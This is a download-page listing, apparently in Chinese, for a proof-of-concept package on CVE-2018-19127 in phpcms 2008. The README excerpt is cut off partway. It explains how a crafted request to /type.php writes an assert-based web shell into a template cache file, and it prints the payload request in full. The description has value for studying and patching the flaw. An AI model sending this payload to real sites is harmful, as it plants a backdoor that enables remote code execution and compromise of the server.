文件名称:phpcms-2008-CVE-2018-19127
文件大小:1KB
文件格式:ZIP
更新时间:2024-04-07 17:35:40
phpcms-2008-CVE-2018-19127 最近,我们在phpcms 2008源代码的/type.php中发现了一个漏洞。当攻击者发送诸如“ /type.php?template=tag _(){}; @ unlink( FILE ); assert($ _ POST [1]); {//../ rss”之类的精心设计的请求时,恶意内容(在这种情况下“ @unlink( FILE ); assert($ _ POST [1]);”)将被写入phpcms 2008网站上的缓存文件(在本例中为“ /cache_template/rss.tpl.php”)。 /type.php中有以下代码: if(empty($template)) $template = 'type'; ... include template('phpcms', $template); 使用以下代码在/inclu
【文件预览】:
phpcms-2008-CVE-2018-19127-master
----README.md(2KB)